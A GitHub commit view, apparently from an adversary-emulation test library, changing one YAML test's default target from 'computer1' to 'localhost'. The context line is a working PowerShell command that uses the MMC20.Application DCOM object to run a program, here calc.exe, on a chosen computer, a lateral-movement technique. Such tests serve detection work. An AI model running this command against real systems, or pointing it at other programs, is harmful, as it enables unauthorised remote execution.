Changed default computer target from computer1 to localhost in the remote execution through MMC (#1218)

Co-authored-by: Didier Cambefort <didier.cambefort@scrt.ch>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Jil Larner
2020-09-15 16:56:52 +02:00
committed by GitHub
parent 00948b0058
commit 74ad1849de
+1 -1
View File
@@ -30,7 +30,7 @@ atomic_tests:
computer_name:
description: Name of Computer
type: string
default: computer1
default: localhost
executor:
command: |
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")